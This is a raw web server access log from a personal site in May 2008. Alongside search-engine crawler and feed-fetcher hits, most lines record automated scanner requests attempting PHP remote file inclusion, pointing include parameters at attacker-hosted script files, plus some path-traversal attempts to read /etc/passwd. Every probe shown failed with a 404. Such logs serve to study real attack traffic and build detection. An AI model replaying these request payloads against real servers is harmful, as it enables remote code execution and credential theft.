72.14.199.86 - - [25/May/2008:17:47:25 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
81.177.22.46 - - [25/May/2008:17:53:58 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/muiema/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
81.177.22.46 - - [25/May/2008:17:53:58 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/muiema/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
80.67.20.173 - - [25/May/2008:17:54:11 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/muiema/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.notahamsandwich.com"
80.67.20.173 - - [25/May/2008:17:54:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/muiema/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.notahamsandwich.com"
72.14.199.86 - - [25/May/2008:18:47:25 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
85.17.3.183 - - [25/May/2008:18:50:17 -0700] "GET //ashnews.php?pathtoashnews=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.236.255.134 - - [25/May/2008:18:57:35 -0700] "GET //atom.php5?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:10:46 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:10:46 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:13:31 -0700] "GET /logs/access_080421.log/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:13:31 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:13:31 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:16:19 -0700] "GET /logs/access.log/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:16:19 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "notahamsandwich.com"
66.7.206.59 - - [25/May/2008:19:16:19 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "notahamsandwich.com"
216.236.255.134 - - [25/May/2008:19:22:07 -0700] "GET /logs/access_080421.log//atom.php5?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
216.236.255.134 - - [25/May/2008:19:22:07 -0700] "GET /logs//atom.php5?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
216.236.255.134 - - [25/May/2008:19:22:07 -0700] "GET /logs/access_080414.log//atom.php5?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
216.236.255.134 - - [25/May/2008:19:31:36 -0700] "GET /logs/access.log//atom.php5?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.47.201.117 - - [25/May/2008:19:52:01 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.notahamsandwich.com"
72.47.201.117 - - [25/May/2008:19:52:01 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.notahamsandwich.com"
72.14.199.31 - - [25/May/2008:19:53:12 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
74.6.17.179 - - [25/May/2008:20:03:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.19.44 - - [25/May/2008:20:03:10 -0700] "GET /blog/?N=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.12.41 - - [25/May/2008:20:04:40 -0700] "GET /blog/?D=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
85.214.72.189 - - [25/May/2008:20:28:47 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.72.189 - - [25/May/2008:20:28:47 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
72.14.199.72 - - [25/May/2008:20:53:14 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
198.106.22.9 - - [25/May/2008:21:07:55 -0700] "GET /logs/access_080414.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [25/May/2008:21:07:55 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [25/May/2008:21:07:56 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
198.106.22.9 - - [25/May/2008:21:08:38 -0700] "GET /logs/access_080407.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.notahamsandwich.com"
209.62.26.18 - - [25/May/2008:21:16:08 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
209.62.26.18 - - [25/May/2008:21:16:08 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
63.134.253.108 - - [25/May/2008:21:16:13 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
63.134.253.108 - - [25/May/2008:21:16:13 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
207.58.138.166 - - [25/May/2008:21:45:25 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
207.58.138.166 - - [25/May/2008:21:45:25 -0700] "GET //ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
207.58.138.166 - - [25/May/2008:21:45:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
207.58.138.166 - - [25/May/2008:21:45:25 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
207.58.138.166 - - [25/May/2008:21:50:23 -0700] "GET //ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
72.14.199.72 - - [25/May/2008:21:53:17 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
66.249.66.131 - - [25/May/2008:22:07:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.notahamsandwich.com"
66.249.66.131 - - [25/May/2008:22:07:41 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 144982 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:16:44 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:16:44 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
212.241.251.88 - - [25/May/2008:22:18:03 -0700] "GET /logs/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [25/May/2008:22:18:03 -0700] "GET /!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [25/May/2008:22:22:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
212.241.251.88 - - [25/May/2008:22:22:47 -0700] "GET //appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
74.52.85.114 - - [25/May/2008:22:28:13 -0700] "GET /logs/access_080421.log//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.52.85.114 - - [25/May/2008:22:28:13 -0700] "GET //appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.52.85.114 - - [25/May/2008:22:28:13 -0700] "GET /logs//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.52.85.114 - - [25/May/2008:22:29:41 -0700] "GET /logs/access_080414.log//appserv/main.php?appserv_root=http://weekly.wassla.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [25/May/2008:22:37:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.notahamsandwich.com"
82.78.216.197 - - [25/May/2008:22:37:17 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.notahamsandwich.com"
207.58.181.74 - - [25/May/2008:22:44:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
207.58.181.74 - - [25/May/2008:22:44:54 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
216.188.60.54 - - [25/May/2008:22:47:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
217.160.203.190 - - [25/May/2008:22:48:57 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
217.160.203.190 - - [25/May/2008:22:48:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.6.31.251 - - [25/May/2008:22:49:59 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.17.169 - - [25/May/2008:22:50:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.17.169 - - [25/May/2008:22:50:21 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:52:58 -0700] "GET /logs/access_080421.log/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:52:58 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:52:59 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.31 - - [25/May/2008:22:54:02 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
217.160.203.190 - - [25/May/2008:22:57:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
217.160.203.190 - - [25/May/2008:22:57:07 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:57:37 -0700] "GET /logs/access.log/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:57:38 -0700] "GET /include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "notahamsandwich.com"
190.54.49.157 - - [25/May/2008:22:57:38 -0700] "GET /logs/include.php?language=0&lang_settings[0][1]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "notahamsandwich.com"
74.6.8.93 - - [25/May/2008:23:11:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "blog.notahamsandwich.com"
74.6.20.126 - - [25/May/2008:23:11:04 -0700] "GET /?p=120 HTTP/1.0" 200 498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "blog.notahamsandwich.com"
66.249.66.131 - - [25/May/2008:23:23:04 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "blog.notahamsandwich.com"
66.249.66.131 - - [25/May/2008:23:23:04 -0700] "GET /?D=A HTTP/1.1" 200 514 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "blog.notahamsandwich.com"
72.14.199.31 - - [25/May/2008:23:54:08 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:43 -0700] "GET /logs/access.log//atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:43 -0700] "GET //atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:43 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:44 -0700] "GET /logs//atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:44 -0700] "GET //ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:44 -0700] "GET /logs//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:57 -0700] "GET /logs//atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:10:57 -0700] "GET //atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:12:35 -0700] "GET /logs//ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:12:36 -0700] "GET //ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:14:02 -0700] "GET //atom.php5?page=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:14:59 -0700] "GET //atom.php5?page=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:15:32 -0700] "GET //ashnews.php?pathtoashnews=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:15:33 -0700] "GET //ashnews.php?pathtoashnews=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:20:51 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
62.75.184.73 - - [26/May/2008:00:20:52 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://correio-virtual.co.cc/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
67.205.74.75 - - [26/May/2008:00:21:03 -0700] "GET /logs//booth.php?include_path=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
67.205.74.75 - - [26/May/2008:00:21:03 -0700] "GET //booth.php?include_path=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:25:35 -0700] "GET /logs//membres/membreManager.php?include_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:25:35 -0700] "GET //membres/membreManager.php?include_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:31:06 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:31:06 -0700] "GET //ashnews.php?pathtoashnews=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:31:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:31:09 -0700] "GET /logs/access_080407.log//ashnews.php?pathtoashnews=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
58.26.137.64 - - [26/May/2008:00:31:28 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.notahamsandwich.com"
58.26.137.64 - - [26/May/2008:00:31:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.notahamsandwich.com"
160.99.12.231 - - [26/May/2008:00:37:04 -0700] "GET /logs/access_080414.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
160.99.12.231 - - [26/May/2008:00:37:05 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
160.99.12.231 - - [26/May/2008:00:37:05 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
209.62.26.18 - - [26/May/2008:00:37:25 -0700] "GET //zero_vote/ask_password.php?dir=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
209.62.26.18 - - [26/May/2008:00:37:25 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:37:49 -0700] "GET /logs/access_080421.log//atom.php5?page=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:37:49 -0700] "GET //atom.php5?page=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:37:49 -0700] "GET /logs//atom.php5?page=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
82.78.216.197 - - [26/May/2008:00:37:49 -0700] "GET /logs/access_080414.log//atom.php5?page=http://www.freewebs.com/ascnet/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
160.99.12.231 - - [26/May/2008:00:38:06 -0700] "GET /logs/access_080407.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
200.6.155.114 - - [26/May/2008:00:39:20 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
200.6.155.114 - - [26/May/2008:00:39:21 -0700] "GET //zero_vote/ask_password.php?dir=http://www.boxinginsider.com/usa/apache.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.notahamsandwich.com"
67.19.11.122 - - [26/May/2008:00:39:44 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
67.19.11.122 - - [26/May/2008:00:39:45 -0700] "GET //zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
74.6.17.169 - - [26/May/2008:00:40:17 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
